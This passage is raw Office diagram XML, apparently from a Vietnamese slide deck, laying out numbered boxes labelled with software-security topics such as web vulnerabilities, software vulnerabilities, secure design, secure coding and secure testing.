    <dgm:cxn modelId="{487AF47F-3F05-4E5A-BDB7-34E6B1078BAF}" type="presParOf" srcId="{1E4E4B14-6A67-4C6A-83AD-83F78CB83996}" destId="{931513B7-AEC5-48E8-8006-E0D4E3D0E82C}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{3F558B05-A1AC-4309-9E0C-EE2F7467E62A}" type="presParOf" srcId="{1E4E4B14-6A67-4C6A-83AD-83F78CB83996}" destId="{DCE1AAD5-8C4B-444E-85B5-41B6CB87E9E4}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{8D05931C-C3E0-4798-A77B-7AC8CDB58028}" type="presParOf" srcId="{DCE1AAD5-8C4B-444E-85B5-41B6CB87E9E4}" destId="{E1A1A6BE-6B38-458E-81A3-5F7788B8D584}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/process1"/>
    <dgm:cxn modelId="{E17C83CC-D1E2-442C-B793-264FF4D67C41}" type="presParOf" srcId="{1E4E4B14-6A67-4C6A-83AD-83F78CB83996}" destId="{00A3DA5D-6E62-4F9D-86FB-D61BDC327B9B}"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11150" y="-2899387"/>
          <a:ext cx="1392300" cy="72066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b="0" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng web</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" b="0" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="75729"/>
        <a:ext cx="7138634" cy="1256368"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7D701CF5-2CC3-48B9-A656-E2968A10AA3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="118912"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" b="1" kern="1200" noProof="0" smtClean="0"/>
            <a:t>1</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" b="1" kern="1200" noProof="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="290255"/>
        <a:ext cx="827314" cy="827314"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5012D0F9-E426-4C44-85B1-B5D15A7B4879}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3876056" y="-837993"/>
          <a:ext cx="2262487" cy="72066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kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng phần mềm</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="1744509"/>
        <a:ext cx="7096154" cy="2041595"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52D715E9-012B-492D-85DB-CC49546E7451}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2180306"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>2</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="2351649"/>
        <a:ext cx="827314" cy="827314"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3876056" y="1658493"/>
          <a:ext cx="2262487" cy="72066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kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>An toàn phần mềm</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="4240995"/>
        <a:ext cx="7096154" cy="2041595"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4676793"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>3</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="4848136"/>
        <a:ext cx="827314" cy="8273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11150" y="-2899387"/>
          <a:ext cx="1392300" cy="72066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b="0" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng web</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" b="0" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="75729"/>
        <a:ext cx="7138634" cy="1256368"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7D701CF5-2CC3-48B9-A656-E2968A10AA3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="118912"/>
          <a:ext cx="1170000" cy="1170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22550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="5900" b="1" kern="1200" noProof="0" smtClean="0"/>
            <a:t>1</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="5900" b="1" kern="1200" noProof="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="290255"/>
        <a:ext cx="827314" cy="827314"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5012D0F9-E426-4C44-85B1-B5D15A7B4879}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3876056" y="-837993"/>
          <a:ext cx="2262487" cy="72066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kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng phần mềm</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="1744509"/>
        <a:ext cx="7096154" cy="2041595"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52D715E9-012B-492D-85DB-CC49546E7451}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2180306"/>
          <a:ext cx="1170000" cy="1170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22550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="5900" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>2</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="5900" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="2351649"/>
        <a:ext cx="827314" cy="827314"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EEC65F55-2BA0-441A-8866-F7EE2965C87B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3876056" y="1658493"/>
          <a:ext cx="2262487" cy="72066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kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>An toàn phần mềm</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="4240995"/>
        <a:ext cx="7096154" cy="2041595"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D21A5F8-FD2A-4CC7-B3EF-BA8E3942F07E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4676793"/>
          <a:ext cx="1170000" cy="1170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22550">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="5900" kern="1200" dirty="0" smtClean="0"/>
            <a:t>3</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="5900" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="4848136"/>
        <a:ext cx="827314" cy="8273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11150" y="-2899387"/>
          <a:ext cx="1392300" cy="72066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b="0" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng web</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" b="0" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="75729"/>
        <a:ext cx="7138634" cy="1256368"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7D701CF5-2CC3-48B9-A656-E2968A10AA3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="118912"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" b="1" kern="1200" noProof="0" smtClean="0"/>
            <a:t>1</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" b="1" kern="1200" noProof="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="290255"/>
        <a:ext cx="827314" cy="827314"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5012D0F9-E426-4C44-85B1-B5D15A7B4879}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3876056" y="-837993"/>
          <a:ext cx="2262487" cy="72066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kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng phần mềm</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="1744509"/>
        <a:ext cx="7096154" cy="2041595"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52D715E9-012B-492D-85DB-CC49546E7451}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2180306"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>2</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="2351649"/>
        <a:ext cx="827314" cy="827314"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3876056" y="1658493"/>
          <a:ext cx="2262487" cy="72066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kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>An toàn phần mềm</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="4240995"/>
        <a:ext cx="7096154" cy="2041595"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4676793"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>3</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="4848136"/>
        <a:ext cx="827314" cy="8273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11150" y="-2899387"/>
          <a:ext cx="1392300" cy="72066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b="0" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng web</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" b="0" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="75729"/>
        <a:ext cx="7138634" cy="1256368"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7D701CF5-2CC3-48B9-A656-E2968A10AA3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="118912"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" b="1" kern="1200" noProof="0" smtClean="0"/>
            <a:t>1</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" b="1" kern="1200" noProof="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="290255"/>
        <a:ext cx="827314" cy="827314"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5012D0F9-E426-4C44-85B1-B5D15A7B4879}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3876056" y="-837993"/>
          <a:ext cx="2262487" cy="72066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kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>Lỗ hổng phần mềm</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="1744509"/>
        <a:ext cx="7096154" cy="2041595"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52D715E9-012B-492D-85DB-CC49546E7451}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2180306"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>2</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="2351649"/>
        <a:ext cx="827314" cy="827314"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0C8BDA2F-5127-4262-8E68-2BE45D20E5D3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3876056" y="1658493"/>
          <a:ext cx="2262487" cy="72066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47650" tIns="165100" rIns="247650" bIns="165100" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0" algn="l" defTabSz="2889250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>An toàn phần mềm</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6500" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1404000" y="4240995"/>
        <a:ext cx="7096154" cy="2041595"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D70D653B-49D3-4408-92E5-E8EA23C919E8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="4676793"/>
          <a:ext cx="1170000" cy="1170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755900">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0" smtClean="0"/>
            <a:t>3</a:t>
          </a:r>
          <a:endParaRPr lang="vi-VN" sz="6200" kern="1200" noProof="0" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="171343" y="4848136"/>
        <a:ext cx="827314" cy="8273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4B11B-1FB0-4E4D-887E-82C7C79B24F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4576" y="0"/>
          <a:ext cx="4402335" cy="61721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dirty="0" smtClean="0"/>
            <a:t>Yêu cầu</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="6500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4576" y="0"/>
        <a:ext cx="4402335" cy="1851660"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{92D5E9C4-B9AA-41FD-AE34-B04F22BD7F33}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="444810" y="1851810"/>
          <a:ext cx="3521868" cy="8991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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3300" kern="1200" smtClean="0"/>
            <a:t>Thiết kế an toàn</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="471145" y="1878145"/>
        <a:ext cx="3469198" cy="846488"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{554ABEAD-EFB0-4ABB-A0A8-16576E38E62F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="444810" y="2889300"/>
          <a:ext cx="3521868" cy="8991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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3300" kern="1200" smtClean="0"/>
            <a:t>Lập trình an toàn</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="471145" y="2915635"/>
        <a:ext cx="3469198" cy="846488"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BE88701F-0306-4D7B-9956-52814B9A671C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="444810" y="3926791"/>
          <a:ext cx="3521868" cy="8991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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3300" kern="1200" smtClean="0"/>
            <a:t>Kiểm thử an toàn</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="471145" y="3953126"/>
        <a:ext cx="3469198" cy="846488"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{99B486E3-5B08-4FD5-AC99-1F112361DE81}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="444810" y="4964281"/>
          <a:ext cx="3521868" cy="8991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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Khai thác an toàn</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="471145" y="4990616"/>
        <a:ext cx="3469198" cy="846488"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{729E3707-EDD4-45AF-9872-109CB750C567}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4737087" y="0"/>
          <a:ext cx="4402335" cy="61721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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="6500" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Thực hiện</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="6500" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4737087" y="0"/>
        <a:ext cx="4402335" cy="1851660"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CD699742-0367-4478-BC0E-18E4FA0D60E3}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5177321" y="1851810"/>
          <a:ext cx="3521868" cy="8991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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Phát triển, Sử dụng</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5203656" y="1878145"/>
        <a:ext cx="3469198" cy="846488"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{BB4D1FAB-0098-4A8E-9648-4B5FC3DE18AC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5177321" y="2889300"/>
          <a:ext cx="3521868" cy="8991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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3300" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Phát triển</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="3300" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5203656" y="2915635"/>
        <a:ext cx="3469198" cy="846488"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{54D07CCB-3F1C-4E99-9A19-DB06B7BE73ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5177321" y="3926791"/>
          <a:ext cx="3521868" cy="8991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rtl="0">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="3300" kern="1200" smtClean="0"/>
